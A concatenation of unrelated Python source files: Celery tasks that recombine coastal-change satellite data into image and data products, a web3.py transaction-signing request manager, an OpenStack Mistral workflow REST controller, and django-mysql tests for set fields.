logger.info("Done with chunk: " + chunk_id)
return path, metadata, {'geo_chunk_id': geo_chunk_id, 'time_chunk_id': time_chunk_id}
@task(name="coastal_change.recombine_geographic_chunks", base=BaseTask, bind=True)
def recombine_geographic_chunks(self, chunks, task_id=None):
"""Recombine processed data over the geographic indices
For each geographic chunk process spawned by the main task, open the resulting dataset
and combine it into a single dataset. Combine metadata as well, writing to disk.
Args:
chunks: list of the return from the processing_task function - path, metadata, and {chunk ids}
Returns:
path to the output product, metadata dict, and a dict containing the geo/time ids
"""
task = CoastalChangeTask.objects.get(pk=task_id)
if check_cancel_task(self, task): return
total_chunks = [chunks] if not isinstance(chunks, list) else chunks
total_chunks = [chunk for chunk in total_chunks if chunk is not None]
if len(total_chunks) == 0:
return None
geo_chunk_id = total_chunks[0][2]['geo_chunk_id']
time_chunk_id = total_chunks[0][2]['time_chunk_id']
metadata = {}
chunk_data = []
for index, chunk in enumerate(total_chunks):
metadata = task.combine_metadata(metadata, chunk[1])
chunk_data.append(xr.open_dataset(chunk[0]))
combined_data = combine_geographic_chunks(chunk_data)
if task.animated_product.animation_id != "none":
path = os.path.join(task.get_temp_path(), "animation_{}.png".format(time_chunk_id))
animated_data = mask_mosaic_with_coastlines(
combined_data
) if task.animated_product.animation_id == "coastline_change" else mask_mosaic_with_coastal_change(
combined_data)
write_png_from_xr(
path,
animated_data,
bands=['red', 'green', 'blue'],
scale=task.satellite.get_scale(),
no_data=task.satellite.no_data_value)
path = os.path.join(task.get_temp_path(), "recombined_geo_{}.nc".format(time_chunk_id))
export_xarray_to_netcdf(combined_data, path)
logger.info("Done combining geographic chunks for time: " + str(time_chunk_id))
return path, metadata, {'geo_chunk_id': geo_chunk_id, 'time_chunk_id': time_chunk_id}
@task(name="coastal_change.recombine_time_chunks", base=BaseTask, bind=True)
def recombine_time_chunks(self, chunks, task_id=None):
"""Recombine processed chunks over the time index.
Open time chunked processed datasets and recombine them using the same function
that was used to process them. This assumes an iterative algorithm - if it is not, then it will
simply return the data again.
Args:
chunks: list of the return from the processing_task function - path, metadata, and {chunk ids}
Returns:
path to the output product, metadata dict, and a dict containing the geo/time ids
"""
logger.info("RECOMBINE_TIME")
task = CoastalChangeTask.objects.get(pk=task_id)
if check_cancel_task(self, task): return
#sorting based on time id - earlier processed first as they're incremented e.g. 0, 1, 2..
total_chunks = sorted(chunks, key=lambda x: x[0]) if isinstance(chunks, list) else [chunks]
if len(total_chunks) == 0:
return None
geo_chunk_id = total_chunks[0][2]['geo_chunk_id']
time_chunk_id = total_chunks[0][2]['time_chunk_id']
metadata = {}
for index, chunk in enumerate(total_chunks):
metadata.update(chunk[1])
# if we've computed an animation, only the last one will be needed for the next pass.
#if there is no animation then this is fine anyways.
path = total_chunks[-1][0]
return path, metadata, {'geo_chunk_id': geo_chunk_id, 'time_chunk_id': time_chunk_id}
@task(name="coastal_change.create_output_products", base=BaseTask, bind=True)
def create_output_products(self, data, task_id=None):
"""Create the final output products for this algorithm.
Open the final dataset and metadata and generate all remaining metadata.
Convert and write the dataset to variuos formats and register all values in the task model
Update status and exit.
Args:
data: tuple in the format of processing_task function - path, metadata, and {chunk ids}
"""
task = CoastalChangeTask.objects.get(pk=task_id)
if check_cancel_task(self, task): return
full_metadata = data[1]
dataset = xr.open_dataset(data[0])
task.result_path = os.path.join(task.get_result_path(), "coastline_change.png")
task.result_coastal_change_path = os.path.join(task.get_result_path(), "coastal_change.png")
task.result_mosaic_path = os.path.join(task.get_result_path(), "mosaic.png")
task.data_path = os.path.join(task.get_result_path(), "data_tif.tif")
task.data_netcdf_path = os.path.join(task.get_result_path(), "data_netcdf.nc")
task.animation_path = os.path.join(task.get_result_path(),
"animation.gif") if task.animated_product.animation_id != 'none' else ""
task.final_metadata_from_dataset(dataset)
task.metadata_from_dict(full_metadata)
bands = task.satellite.get_measurements() + ['coastal_change', 'coastline_old', 'coastline_new']
png_bands = ['red', 'green', 'blue']
export_xarray_to_netcdf(dataset, task.data_netcdf_path)
write_geotiff_from_xr(task.data_path, dataset.astype('int32'), bands=bands, no_data=task.satellite.no_data_value)
write_png_from_xr(
task.result_path,
mask_mosaic_with_coastlines(dataset),
bands=png_bands,
scale=task.satellite.get_scale(),
no_data=task.satellite.no_data_value)
write_png_from_xr(
task.result_coastal_change_path,
mask_mosaic_with_coastal_change(dataset),
bands=png_bands,
scale=task.satellite.get_scale(),
no_data=task.satellite.no_data_value)
write_png_from_xr(
task.result_mosaic_path,
dataset,
bands=png_bands,
scale=task.satellite.get_scale(),
no_data=task.satellite.no_data_value)
if task.animated_product.animation_id != "none":
with imageio.get_writer(task.animation_path, mode='I', duration=1.0) as writer:
for index in range(task.time_end - task.time_start):
path = os.path.join(task.get_temp_path(), "animation_{}.png".format(index))
if os.path.exists(path):
image = imageio.imread(path)
writer.append_data(image)
logger.info("All products created.")
# task.update_bounds_from_dataset(dataset)
task.complete = True
task.execution_end = datetime.now()
task.update_status("OK", "All products have been generated. Your result will be loaded on the map.")
return True
| |
import uuid
import json
import collections
import gevent
import rlp
from web3.utils.crypto import sha3
from web3.utils.string import force_text
from web3.utils.address import to_address
from web3.utils.encoding import (
to_decimal,
encode_hex,
decode_hex,
)
from web3.utils.transactions import (
is_bitcoin_available,
Transaction,
serialize_transaction,
add_signature_to_transaction,
)
class RequestManager(object):
def __init__(self, provider):
self.pending_requests = {}
self.provider = provider
def setProvider(self, provider):
self.provider = provider
def request_blocking(self, method, params):
"""
Make a synchronous request using the provider
"""
response_raw = self.provider.make_request(method, params)
response = json.loads(force_text(response_raw))
if "error" in response:
raise ValueError(response["error"])
return response['result']
def request_async(self, method, params):
request_id = uuid.uuid4()
self.pending_requests[request_id] = gevent.spawn(
self.request_blocking,
method,
params,
)
return request_id
def receive_blocking(self, request_id, timeout=None):
try:
request = self.pending_requests.pop(request_id)
except KeyError:
raise KeyError("Request for id:{0} not found".format(request_id))
else:
if timeout is not None:
timeout = gevent.Timeout(timeout).start()
response_raw = request.get(timeout=timeout)
response = json.loads(response_raw)
if "error" in response:
raise ValueError(response["error"])
return response['result']
def receive_async(self, request_id, *args, **kwargs):
raise NotImplementedError("Callback pattern not implemented")
class ManagerWrapper(object):
def __init__(self, wrapped_manager):
self.wrapped_manager = wrapped_manager
@property
def provider(self):
return self.wrapped_manager.provider
@property
def pending_requests(self):
return self.wrapped_manager.pending_requests
def setProvider(self, provider):
self.wrapped_manager.provider = provider
def request_blocking(self, *args, **kwargs):
return self.wrapped_manager.request_blocking(*args, **kwargs)
def request_async(self, *args, **kwargs):
return self.wrapped_manager.request_async(*args, **kwargs)
def receive_blocking(self, *args, **kwargs):
return self.wrapped_manager.receive_blocking(*args, **kwargs)
def receive_async(self, *args, **kwargs):
return self.wrapped_manager.receive_async(*args, **kwargs)
class BaseSendRawTransactionMixin(ManagerWrapper):
_known_transactions = None
_known_nonces = None
def __init__(self, *args, **kwargs):
self._known_transactions = collections.defaultdict(set)
self._known_nonces = collections.defaultdict(set)
super(BaseSendRawTransactionMixin, self).__init__(*args, **kwargs)
def _get_nonces_and_cleanup(self, addr, chain_nonce):
all_txns = {
txn_hash: self.request_blocking(
'eth_getTransactionByHash',
[txn_hash],
) for txn_hash in self._known_transactions[addr]
}
for txn_hash, txn in all_txns.items():
if txn is None:
continue
txn_nonce = to_decimal(txn['nonce'])
if txn_nonce < chain_nonce:
self._known_transactions[addr].discard(txn_hash)
else:
yield txn_nonce
all_known_nonces = tuple(self._known_nonces[addr])
for nonce in all_known_nonces:
if nonce < chain_nonce:
self._known_nonces[addr].discard(nonce)
else:
yield nonce
def get_chain_nonce(self, addr):
chain_nonce = to_decimal(self.request_blocking(
'eth_getTransactionCount',
[addr, 'pending']
))
return chain_nonce
def get_nonce(self, addr):
chain_nonce = self.get_chain_nonce(addr)
tracked_txn_nonces = tuple(self._get_nonces_and_cleanup(addr, chain_nonce))
nonce = max(0, chain_nonce, *tracked_txn_nonces)
if nonce == 0 and not tracked_txn_nonces:
return -1
else:
return nonce
def get_transaction_signature(self, serialized_txn):
raise NotImplementedError("Must be implemented by subclasses")
def sign_and_serialize_transaction(self, transaction):
serialized_txn = serialize_transaction(transaction)
signature = self.get_transaction_signature(transaction)
signed_transaction = add_signature_to_transaction(
serialized_txn,
signature,
)
signed_and_serialized_txn = rlp.encode(signed_transaction, Transaction)
return signed_and_serialized_txn
def construct_full_transaction(self, base_transaction):
txn_from = base_transaction['from']
full_txn = dict(**base_transaction)
full_txn.setdefault('nonce', self.get_nonce(txn_from) + 1)
full_txn.setdefault('gasPrice', self.request_blocking(
'eth_gasPrice', []
))
full_txn.setdefault('gas', hex(90000))
full_txn.setdefault('value', '0x0')
full_txn.setdefault('to', '')
full_txn.setdefault('data', '')
return full_txn
TXN_SENDING_METHODS = {
'eth_sendTransaction',
'eth_sendRawTransaction',
'personal_signAndSendTransaction',
'personal_sendTransaction',
}
def request_blocking(self, method, params):
if method == 'eth_sendTransaction':
base_transaction = params[0]
# create a fully signed transaction and send through the
# `eth_sendRawTransaction` endpoint instead.
full_transaction = self.construct_full_transaction(base_transaction)
raw_transaction_bytes = self.sign_and_serialize_transaction(
full_transaction,
)
raw_transaction_bytes_as_hex = encode_hex(raw_transaction_bytes)
return self.request_blocking(
'eth_sendRawTransaction', [raw_transaction_bytes_as_hex],
)
result = super(BaseSendRawTransactionMixin, self).request_blocking(
method, params,
)
if method in self.TXN_SENDING_METHODS:
if method == 'eth_sendRawTransaction':
txn = rlp.decode(decode_hex(params[0]), Transaction)
self._known_transactions[to_address(txn.sender)].add(result)
self._known_nonces[to_address(txn.sender)].add(txn.nonce)
else:
txn = params[0]
self._known_transactions[to_address(txn['from'])].add(result)
if 'nonce' in txn:
self._known_nonces[to_address(txn['from'])].add(
to_decimal(txn['nonce'])
)
return result
class DelegatedSigningManager(BaseSendRawTransactionMixin):
def __init__(self, *args, **kwargs):
self.signing_manager = kwargs.pop('signing_manager')
super(DelegatedSigningManager, self).__init__(*args, **kwargs)
def get_chain_nonce(self, addr):
signer_nonce = to_decimal(self.signing_manager.request_blocking(
'eth_getTransactionCount',
[addr, 'pending']
))
wrapped_nonce = to_decimal(self.wrapped_manager.request_blocking(
'eth_getTransactionCount',
[addr, 'pending']
))
return max(signer_nonce, wrapped_nonce)
def get_transaction_signature(self, transaction):
serialized_txn = serialize_transaction(transaction)
hash_to_sign = self.signing_manager.request_blocking(
'web3_sha3', [encode_hex(serialized_txn)],
)
signature_hex = self.signing_manager.request_blocking(
'eth_sign',
[
transaction['from'],
hash_to_sign,
],
)
signature = decode_hex(signature_hex)
return signature
class PrivateKeySigningManager(BaseSendRawTransactionMixin):
def __init__(self, *args, **kwargs):
if not is_bitcoin_available():
raise ImportError(
"In order to use the `PrivateKeySigningManager` the "
"`bitcoin` and `secp256k1` packages must be installed."
)
self.keys = kwargs.pop('keys', {})
super(PrivateKeySigningManager, self).__init__(*args, **kwargs)
def register_private_key(self, key):
from bitcoin import privtopub
address = to_address(sha3(privtopub(key)[1:])[-40:])
self.keys[address] = key
def sign_and_serialize_transaction(self, transaction):
txn_from = to_address(transaction['from'])
if txn_from not in self.keys:
raise KeyError("No signing key registered for from address: {0}".format(txn_from))
transaction = Transaction(
nonce=to_decimal(transaction['nonce']),
gasprice=to_decimal(transaction['gasPrice']),
startgas=to_decimal(transaction['gas']),
to=transaction['to'],
value=to_decimal(transaction['value']),
data=decode_hex(transaction['data']),
)
transaction.sign(self.keys[txn_from])
assert to_address(transaction.sender) == txn_from
return rlp.encode(transaction, Transaction)
| |
# Copyright 2013 - Mirantis, Inc.
# Copyright 2015 - StackStorm, Inc.
# Copyright 2015 Huawei Technologies Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_log import log as logging
from oslo_utils import uuidutils
import pecan
from pecan import hooks
from pecan import rest
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from mistral.api import access_control as acl
from mistral.api.controllers.v2 import member
from mistral.api.controllers.v2 import resources
from mistral.api.controllers.v2 import types
from mistral.api.controllers.v2 import validation
from mistral.api.hooks import content_type as ct_hook
from mistral import context
from mistral.db.v2 import api as db_api
from mistral import exceptions as exc
from mistral.lang import parser as spec_parser
from mistral.services import workflows
from mistral.utils import filter_utils
from mistral.utils import rest_utils
LOG = logging.getLogger(__name__)
class WorkflowsController(rest.RestController, hooks.HookController):
# TODO(nmakhotkin): Have a discussion with pecan/WSME folks in order
# to have requests and response of different content types. Then
# delete ContentTypeHook.
__hooks__ = [ct_hook.ContentTypeHook("application/json", ['POST', 'PUT'])]
validate = validation.SpecValidationController(
spec_parser.get_workflow_list_spec_from_yaml)
@pecan.expose()
def _lookup(self, identifier, sub_resource, *remainder):
LOG.debug(
"Lookup subcontrollers of WorkflowsController, "
"sub_resource: %s, remainder: %s.",
sub_resource,
remainder
)
if sub_resource == 'members':
if not uuidutils.is_uuid_like(identifier):
raise exc.WorkflowException(
"Only support UUID as resource identifier in resource "
"sharing feature."
)
# We don't check workflow's existence here, since a user may query
# members of a workflow, which doesn't belong to him/her.
return member.MembersController('workflow', identifier), remainder
return super(WorkflowsController, self)._lookup(
identifier,
sub_resource,
*remainder
)
@rest_utils.wrap_wsme_controller_exception
@wsme_pecan.wsexpose(resources.Workflow, wtypes.text, wtypes.text)
def get(self, identifier, namespace=''):
"""Return the named workflow.
:param identifier: Name or UUID of the workflow to retrieve.
:param namespace: Optional. Namespace of the workflow to retrieve.
"""
acl.enforce('workflows:get', context.ctx())
LOG.debug("Fetch workflow [identifier=%s]", identifier)
# Use retries to prevent possible failures.
r = rest_utils.create_db_retry_object()
db_model = r.call(
db_api.get_workflow_definition,
identifier,
namespace=namespace
)
return resources.Workflow.from_db_model(db_model)
@rest_utils.wrap_pecan_controller_exception
@pecan.expose(content_type="text/plain")
def put(self, identifier=None, namespace=''):
"""Update one or more workflows.
:param identifier: Optional. If provided, it's UUID of a workflow.
Only one workflow can be updated with identifier param.
:param namespace: Optional. If provided int's the namespace of the
workflow/workflows. currently namespace cannot be
changed.
The text is allowed to have definitions of multiple workflows. In this
case they all will be updated.
"""
acl.enforce('workflows:update', context.ctx())
definition = pecan.request.text
scope = pecan.request.GET.get('scope', 'private')
if scope not in resources.SCOPE_TYPES.values:
raise exc.InvalidModelException(
"Scope must be one of the following: %s; actual: "
"%s" % (resources.SCOPE_TYPES.values, scope)
)
LOG.debug("Update workflow(s) [definition=%s]", definition)
db_wfs = workflows.update_workflows(
definition,
scope=scope,
identifier=identifier,
namespace=namespace
)
workflow_list = [
resources.Workflow.from_db_model(db_wf) for db_wf in db_wfs
]
return (workflow_list[0].to_json() if identifier
else resources.Workflows(workflows=workflow_list).to_json())
@rest_utils.wrap_pecan_controller_exception
@pecan.expose(content_type="text/plain")
def post(self, namespace=''):
"""Create a new workflow.
NOTE: The text is allowed to have definitions
of multiple workflows. In this case they all will be created.
:param namespace: Optional. The namespace to create the workflow
in. Workflows with the same name can be added to a given
project if are in two different namespaces.
"""
acl.enforce('workflows:create', context.ctx())
definition = pecan.request.text
scope = pecan.request.GET.get('scope', 'private')
pecan.response.status = 201
if scope not in resources.SCOPE_TYPES.values:
raise exc.InvalidModelException(
"Scope must be one of the following: %s; actual: "
"%s" % (resources.SCOPE_TYPES.values, scope)
)
LOG.debug("Create workflow(s) [definition=%s]", definition)
db_wfs = workflows.create_workflows(
definition,
scope=scope,
namespace=namespace
)
workflow_list = [
resources.Workflow.from_db_model(db_wf) for db_wf in db_wfs
]
return resources.Workflows(workflows=workflow_list).to_json()
@rest_utils.wrap_wsme_controller_exception
@wsme_pecan.wsexpose(None, wtypes.text, wtypes.text, status_code=204)
def delete(self, identifier, namespace=''):
"""Delete a workflow.
:param identifier: Name or ID of workflow to delete.
:param namespace: Optional. Namespace of the workflow to delete.
"""
acl.enforce('workflows:delete', context.ctx())
LOG.debug("Delete workflow [identifier=%s, namespace=%s]",
identifier, namespace)
with db_api.transaction():
db_api.delete_workflow_definition(identifier, namespace)
@rest_utils.wrap_wsme_controller_exception
@wsme_pecan.wsexpose(resources.Workflows, types.uuid, int,
types.uniquelist, types.list, types.uniquelist,
wtypes.text, wtypes.text, wtypes.text, wtypes.text,
resources.SCOPE_TYPES, types.uuid, wtypes.text,
wtypes.text, bool, wtypes.text)
def get_all(self, marker=None, limit=None, sort_keys='created_at',
sort_dirs='asc', fields='', name=None, input=None,
definition=None, tags=None, scope=None,
project_id=None, created_at=None, updated_at=None,
all_projects=False, namespace=None):
"""Return a list of workflows.
:param marker: Optional. Pagination marker for large data sets.
:param limit: Optional. Maximum number of resources to return in a
single result. Default value is None for backward
compatibility.
:param sort_keys: Optional. Columns to sort results by.
Default: created_at.
:param sort_dirs: Optional. Directions to sort corresponding to
sort_keys, "asc" or "desc" can be chosen.
Default: asc.
:param fields: Optional. A specified list of fields of the resource to
be returned. 'id' will be included automatically in
fields if it's provided, since it will be used when
constructing 'next' link.
:param name: Optional. Keep only resources with a specific name.
:param namespace: Optional. Keep only resources with a specific
namespace
:param input: Optional. Keep only resources with a specific input.
:param definition: Optional. Keep only resources with a specific
definition.
:param tags: Optional. Keep only resources containing specific tags.
:param scope: Optional. Keep only resources with a specific scope.
:param project_id: Optional. The same as the requester project_id
or different if the scope is public.
:param created_at: Optional. Keep only resources created at a specific
time and date.
:param updated_at: Optional. Keep only resources with specific latest
update time and date.
:param all_projects: Optional. Get resources of all projects.
"""
acl.enforce('workflows:list', context.ctx())
if all_projects:
acl.enforce('workflows:list:all_projects', context.ctx())
filters = filter_utils.create_filters_from_request_params(
created_at=created_at,
name=name,
scope=scope,
tags=tags,
updated_at=updated_at,
input=input,
definition=definition,
project_id=project_id,
namespace=namespace
)
LOG.debug("Fetch workflows. marker=%s, limit=%s, sort_keys=%s, "
"sort_dirs=%s, fields=%s, filters=%s, all_projects=%s",
marker, limit, sort_keys, sort_dirs, fields, filters,
all_projects)
return rest_utils.get_all(
resources.Workflows,
resources.Workflow,
db_api.get_workflow_definitions,
db_api.get_workflow_definition_by_id,
marker=marker,
limit=limit,
sort_keys=sort_keys,
sort_dirs=sort_dirs,
fields=fields,
all_projects=all_projects,
**filters
)
| |
from __future__ import annotations
import json
import re
import pytest
from django import forms
from django.core import exceptions, serializers
from django.core.management import call_command
from django.db import connection, models
from django.db.migrations.writer import MigrationWriter
from django.db.models import Q, Value
from django.test import SimpleTestCase, TestCase, TransactionTestCase, override_settings
from django.test.utils import isolate_apps
from django_mysql.forms import SimpleSetField
from django_mysql.models import SetCharField, SetF
from django_mysql.test.utils import override_mysql_variables
from tests.testapp.models import CharSetDefaultModel, CharSetModel, IntSetModel
class TestSaveLoad(TestCase):
def test_char_easy(self):
s = CharSetModel.objects.create(field={"big", "comfy"})
assert s.field == {"comfy", "big"}
s = CharSetModel.objects.get(id=s.id)
assert s.field == {"comfy", "big"}
s.field.add("round")
s.save()
assert s.field == {"comfy", "big", "round"}
s = CharSetModel.objects.get(id=s.id)
assert s.field == {"comfy", "big", "round"}
def test_char_string_direct(self):
s = CharSetModel.objects.create(field="big,bad")
s = CharSetModel.objects.get(id=s.id)
assert s.field == {"big", "bad"}
def test_is_a_set_immediately(self):
s = CharSetModel()
assert s.field == set()
s.field.add("bold")
s.field.add("brave")
s.save()
assert s.field == {"bold", "brave"}
s = CharSetModel.objects.get(id=s.id)
assert s.field == {"bold", "brave"}
def test_empty(self):
s = CharSetModel.objects.create()
assert s.field == set()
s = CharSetModel.objects.get(id=s.id)
assert s.field == set()
def test_char_cant_create_sets_with_empty_string(self):
with pytest.raises(ValueError):
CharSetModel.objects.create(field={""})
def test_char_cant_create_sets_with_commas(self):
with pytest.raises(ValueError):
CharSetModel.objects.create(field={"co,mma", "contained"})
def test_char_basic_lookup(self):
mymodel = CharSetModel.objects.create()
empty = CharSetModel.objects.filter(field="")
assert empty.count() == 1
assert empty[0] == mymodel
mymodel.delete()
assert empty.count() == 0
def test_char_lookup_contains(self):
self.check_char_lookup("contains")
def test_char_lookup_icontains(self):
self.check_char_lookup("icontains")
def check_char_lookup(self, lookup):
lname = "field__" + lookup
mymodel = CharSetModel.objects.create(field={"mouldy", "rotten"})
mouldy = CharSetModel.objects.filter(**{lname: "mouldy"})
assert mouldy.count() == 1
assert mouldy[0] == mymodel
rotten = CharSetModel.objects.filter(**{lname: "rotten"})
assert rotten.count() == 1
assert rotten[0] == mymodel
clean = CharSetModel.objects.filter(**{lname: "clean"})
assert clean.count() == 0
with pytest.raises(ValueError):
list(CharSetModel.objects.filter(**{lname: {"a", "b"}}))
both = CharSetModel.objects.filter(
Q(**{lname: "mouldy"}) & Q(**{lname: "rotten"})
)
assert both.count() == 1
assert both[0] == mymodel
either = CharSetModel.objects.filter(
Q(**{lname: "mouldy"}) | Q(**{lname: "clean"})
)
assert either.count() == 1
not_clean = CharSetModel.objects.exclude(**{lname: "clean"})
assert not_clean.count() == 1
not_mouldy = CharSetModel.objects.exclude(**{lname: "mouldy"})
assert not_mouldy.count() == 0
def test_char_len_lookup_empty(self):
mymodel = CharSetModel.objects.create(field=set())
empty = CharSetModel.objects.filter(field__len=0)
assert empty.count() == 1
assert empty[0] == mymodel
one = CharSetModel.objects.filter(field__len=1)
assert one.count() == 0
one_or_more = CharSetModel.objects.filter(field__len__gte=0)
assert one_or_more.count() == 1
def test_char_len_lookup(self):
mymodel = CharSetModel.objects.create(field={"red", "expensive"})
empty = CharSetModel.objects.filter(field__len=0)
assert empty.count() == 0
one_or_more = CharSetModel.objects.filter(field__len__gte=1)
assert one_or_more.count() == 1
assert one_or_more[0] == mymodel
two = CharSetModel.objects.filter(field__len=2)
assert two.count() == 1
assert two[0] == mymodel
three = CharSetModel.objects.filter(field__len=3)
assert three.count() == 0
def test_char_default(self):
mymodel = CharSetDefaultModel.objects.create()
assert mymodel.field == {"a", "d"}
mymodel = CharSetDefaultModel.objects.get(id=mymodel.id)
assert mymodel.field == {"a", "d"}
def test_int_easy(self):
mymodel = IntSetModel.objects.create(field={1, 2})
assert mymodel.field == {1, 2}
mymodel = IntSetModel.objects.get(id=mymodel.id)
assert mymodel.field == {1, 2}
def test_int_contains_lookup(self):
onetwo = IntSetModel.objects.create(field={1, 2})
ones = IntSetModel.objects.filter(field__contains=1)
assert ones.count() == 1
assert ones[0] == onetwo
twos = IntSetModel.objects.filter(field__contains=2)
assert twos.count() == 1
assert twos[0] == onetwo
threes = IntSetModel.objects.filter(field__contains=3)
assert threes.count() == 0
with pytest.raises(ValueError):
list(IntSetModel.objects.filter(field__contains={1, 2}))
ones_and_twos = IntSetModel.objects.filter(
Q(field__contains=1) & Q(field__contains=2)
)
assert ones_and_twos.count() == 1
assert ones_and_twos[0] == onetwo
ones_and_threes = IntSetModel.objects.filter(
Q(field__contains=1) & Q(field__contains=3)
)
assert ones_and_threes.count() == 0
ones_or_threes = IntSetModel.objects.filter(
Q(field__contains=1) | Q(field__contains=3)
)
assert ones_or_threes.count() == 1
no_three = IntSetModel.objects.exclude(field__contains=3)
assert no_three.count() == 1
no_one = IntSetModel.objects.exclude(field__contains=1)
assert no_one.count() == 0
class TestSetF(TestCase):
def test_add_to_none(self):
CharSetModel.objects.create(field=set())
CharSetModel.objects.update(field=SetF("field").add("first"))
model = CharSetModel.objects.get()
assert model.field == {"first"}
def test_add_to_one(self):
CharSetModel.objects.create(field={"big"})
CharSetModel.objects.update(field=SetF("field").add("bad"))
model = CharSetModel.objects.get()
assert model.field == {"big", "bad"}
def test_add_to_some(self):
CharSetModel.objects.create(field={"big", "blue"})
CharSetModel.objects.update(field=SetF("field").add("round"))
model = CharSetModel.objects.get()
assert model.field == {"big", "blue", "round"}
def test_add_to_multiple_objects(self):
CharSetModel.objects.create(field={"mouse"})
CharSetModel.objects.create(field={"keyboard"})
CharSetModel.objects.update(field=SetF("field").add("screen"))
first, second = tuple(CharSetModel.objects.all())
assert first.field == {"mouse", "screen"}
assert second.field == {"keyboard", "screen"}
def test_add_exists(self):
CharSetModel.objects.create(field={"nice"})
CharSetModel.objects.update(field=SetF("field").add("nice"))
model = CharSetModel.objects.get()
assert model.field == {"nice"}
def test_add_expression(self):
CharSetModel.objects.create(field={"a"})
CharSetModel.objects.update(field=SetF("field").add(Value("b")))
model = CharSetModel.objects.get()
assert model.field == {"a", "b"}
@override_mysql_variables(SQL_MODE="ANSI")
def test_add_works_in_ansi_mode(self):
CharSetModel.objects.create()
CharSetModel.objects.update(field=SetF("field").add("big"))
CharSetModel.objects.update(field=SetF("field").add("bad"))
model = CharSetModel.objects.get()
assert model.field == {"big", "bad"}
def test_add_assignment(self):
model = CharSetModel.objects.create(field={"red"})
model.field = SetF("field").add("blue")
model.save()
model = CharSetModel.objects.get()
assert model.field == {"red", "blue"}
def test_remove_one(self):
CharSetModel.objects.create(field={"dopey", "knifey"})
CharSetModel.objects.update(field=SetF("field").remove("knifey"))
model = CharSetModel.objects.get()
assert model.field == {"dopey"}
def test_remove_only_one(self):
CharSetModel.objects.create(field={"pants"})
CharSetModel.objects.update(field=SetF("field").remove("pants"))
model = CharSetModel.objects.get()
assert model.field == set()
def test_remove_from_none(self):
CharSetModel.objects.create(field=set())
CharSetModel.objects.update(field=SetF("field").remove("jam"))
model = CharSetModel.objects.get()
assert model.field == set()
def test_remove_first(self):
CharSetModel.objects.create()
CharSetModel.objects.update(field="a,b,c")
CharSetModel.objects.update(field=SetF("field").remove("a"))
model = CharSetModel.objects.get()
assert model.field == {"b", "c"}
def test_remove_middle(self):
CharSetModel.objects.create()
CharSetModel.objects.update(field="a,b,c")
CharSetModel.objects.update(field=SetF("field").remove("b"))
model = CharSetModel.objects.get()
assert model.field == {"a", "c"}
def test_remove_last(self):
CharSetModel.objects.create()
CharSetModel.objects.update(field="a,b,c")
CharSetModel.objects.update(field=SetF("field").remove("c"))
model = CharSetModel.objects.get()
assert model.field == {"a", "b"}
def test_remove_not_exists(self):
CharSetModel.objects.create(field={"nice"})
CharSetModel.objects.update(field=SetF("field").remove("naughty"))
model = CharSetModel.objects.get()
assert model.field == {"nice"}
def test_remove_expression(self):
CharSetModel.objects.create(field={"a"})
CharSetModel.objects.update(field=SetF("field").remove(Value("a")))
model = CharSetModel.objects.get()
assert model.field == set()
def test_remove_from_multiple_objects(self):
CharSetModel.objects.create(field={"mouse", "chair"})
CharSetModel.objects.create(field={"keyboard", "chair"})
CharSetModel.objects.update(field=SetF("field").remove("chair"))
first, second = tuple(CharSetModel.objects.all())
assert first.field == {"mouse"}
assert second.field == {"keyboard"}
@override_mysql_variables(SQL_MODE="ANSI")
def test_remove_works_in_ansi_mode(self):
CharSetModel.objects.create(field={"bold"})
CharSetModel.objects.update(field=SetF("field").remove("big"))
CharSetModel.objects.update(field=SetF("field").remove("bold"))
CharSetModel.objects.update(field=SetF("field").remove("bad"))
model = CharSetModel.objects.get()
assert model.field == set()
def test_remove_assignment(self):
model = IntSetModel.objects.create(field={24, 89})
model.field = SetF("field").remove(89)
model.save()
model = IntSetModel.objects.get()
assert model.field == {24}
def test_works_with_two_fields(self):
CharSetModel.objects.create(
field={"snickers", "lion"}, field2={"apple", "orange"}
)
# Concurrent add
CharSetModel.objects.update(
field=SetF("field").add("mars"), field2=SetF("field2").add("banana")
)
model = CharSetModel.objects.get()
assert model.field == {"snickers", "lion", "mars"}
assert model.field2 == {"apple", "orange", "banana"}
# Concurrent add and remove
CharSetModel.objects.update(
field=SetF("field").add("reeses"), field2=SetF("field2").remove("banana")
)
model = CharSetModel.objects.get()
assert model.field == {"snickers", "lion", "mars", "reeses"}
assert model.field2 == {"apple", "orange"}
# Swap
CharSetModel.objects.update(
field=SetF("field").remove("lion"), field2=SetF("field2").remove("apple")
)
model = CharSetModel.objects.get()
assert model.field == {"snickers", "mars", "reeses"}
assert model.field2 == {"orange"}
class TestValidation(SimpleTestCase):
def test_max_length(self):
field = SetCharField(models.CharField(max_length=32), size=3, max_length=32)
field.clean({"a", "b", "c"}, None)
with pytest.raises(exceptions.ValidationError) as excinfo:
field.clean({"a", "b", "c", "d"}, None)
assert (
excinfo.value.messages[0]
== "Set contains 4 items, it should contain no more than 3."
)
@isolate_apps("tests.testapp")
class TestCheck(SimpleTestCase):
def test_model_set(self):
field = IntSetModel._meta.get_field("field")
assert field.model == IntSetModel
# I think this is a side effect of migrations being run in tests -
# the base_field.model is the __fake__ model
assert field.base_field.model.__name__ == "IntSetModel"
def test_base_field_checks(self):
class Invalid(models.Model):
field = SetCharField(models.CharField(), max_length=32)
errors = Invalid.check()
assert len(errors) == 1
assert errors[0].id == "django_mysql.E001"
assert "Base field for set has errors" in errors[0].msg
assert "max_length" in errors[0].msg
def test_invalid_base_fields(self):
class Invalid(models.Model):
field = SetCharField(
models.ForeignKey("testapp.Author", on_delete=models.CASCADE),
max_length=32,
)
errors = Invalid.check()
assert len(errors) == 1
assert errors[0].id == "django_mysql.E002"
assert "Base field for set must be" in errors[0].msg
def test_max_length_including_base(self):
class Invalid(models.Model):
field = SetCharField(models.CharField(max_length=32), size=2, max_length=32)
errors = Invalid.check()
assert len(errors) == 1
assert errors[0].id == "django_mysql.E003"
assert "Field can overrun" in errors[0].msg
def test_max_length_missing_doesnt_crash(self):
class Invalid(models.Model):
field = SetCharField(models.CharField(max_length=2), size=2)
errors = Invalid.check()
assert len(errors) == 1
assert errors[0].id == "fields.E120"
assert errors[0].msg == "CharFields must define a 'max_length' attribute."
class TestDeconstruct(TestCase):
def test_deconstruct(self):
